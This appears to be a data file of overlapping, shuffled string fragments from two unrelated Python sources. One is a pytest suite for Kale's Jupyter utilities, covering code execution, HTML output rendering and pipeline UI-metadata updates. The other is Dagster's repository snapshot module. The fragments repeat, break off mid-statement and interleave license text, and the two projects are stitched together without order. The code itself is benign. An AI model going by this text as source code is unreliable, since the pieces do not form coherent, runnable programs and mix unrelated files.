"from kale.utils import jupyter_utils as ju def _output_display(data): # `data` must be a",
"test standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic",
"base tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath,",
"tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w'))",
"cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata",
"'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that",
"'test_wk' # create base tmp file markdown = { 'type': 'markdown', 'storage': 'inline',",
"in compliance with the License. # You may obtain a copy of the",
"{ 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]}",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value",
"'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"= 3\\nprint(a)\", ) ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some dull code')\",",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) #",
"See the License for the specific language governing permissions and # limitations under",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"} base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) #",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"\"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is",
"License. import os import json import pytest from testfixtures import mock from kale.utils",
"@mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when it does",
"file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value =",
"(_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}),",
"'test_wk' # create base tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir,",
"file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read())",
"_output_display(data): # `data` must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\",",
"@pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html':",
"# test standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"except in compliance with the License. # You may obtain a copy of",
"must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"),",
"def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when it does not",
"target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils')",
"'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown = { 'type':",
"{\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk'",
"def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value",
"'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that",
"== target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated",
"as ju def _output_display(data): # `data` must be a list return [{'output_type': 'display_data',",
"create base tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base,",
"\"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ])",
"os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been",
"assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file",
"test_run_code(): \"\"\"Test that Python code runs inside a jupyter kernel successfully.\"\"\" # test",
"permissions and # limitations under the License. import os import json import pytest",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
") ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some dull code')\", ) ju.run_code(code)",
"[markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test',",
"'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils,",
"[ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}),",
"= json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'",
"3\\nprint(a)\", ) ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some dull code')\", )"
] |
[
"__new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot",
"repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in",
"self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod",
"def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in",
"'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for",
"get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')):",
"return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition,",
"'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param(",
"pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return",
"def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def",
"if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots",
"'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False",
"pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return",
"self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name,",
"def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name:",
"name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name')",
"pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline",
"'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots )",
"dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot):",
"in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name",
"pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self,",
"check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def",
"self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name):",
"in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name):",
"def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name,",
"pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition',",
"'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots:",
"get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return",
"= check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot",
"def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def",
"return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def",
"def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots):",
"self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls,",
"pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True",
"of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if",
"not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return",
"found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot(",
"import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot",
"for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def",
"PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self,",
"if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name')",
"pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod",
"True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if",
"from collections import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import",
"for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name):",
"from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return",
"RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map =",
"name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ),",
"get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self):",
") def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map",
"pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in",
"def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict(",
"RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'),",
"return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def",
"return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition))",
"return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values()",
"pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline",
"RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex:",
"super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self,",
"has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition):",
"pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), )",
"has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return",
"self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for",
"from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot,",
"return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots:",
"pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots,",
"== pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline",
"cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name,",
"pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in",
"check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition)",
"return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot,",
"check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline",
"@staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition",
"dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes",
") def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name ==",
"import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot",
"class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map",
"), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name",
"pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes",
"__init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name,",
"RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__(",
"OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from",
"check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in",
"check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return",
"pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition):",
"return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition)",
"self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return",
"pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return",
"@whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls,",
"from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in repository_definition.get_all_pipelines()",
"get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[",
"whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot )",
"cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name):",
"'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in repository_definition.get_all_pipelines() ], )",
"<filename>python_modules/dagster/dagster/core/snap/repository_snapshot.py from collections import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot",
"collections import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex,",
"OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name]",
"== pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def",
"pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def",
"from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self,",
"check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in repository_definition.get_all_pipelines() ],",
"'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not",
"repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot))",
"False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name ==",
"self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot',",
"dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot',",
"(pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def",
"self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for",
"in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class",
"@staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name,",
"= OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return",
"in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self):",
"PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param(",
"PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot =",
"import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot",
"repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots",
"class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name,",
"import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class",
"RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def",
") self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self,",
"for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found')",
"def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name",
"pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for",
"def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name:",
"return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name",
"def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots',",
"namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes",
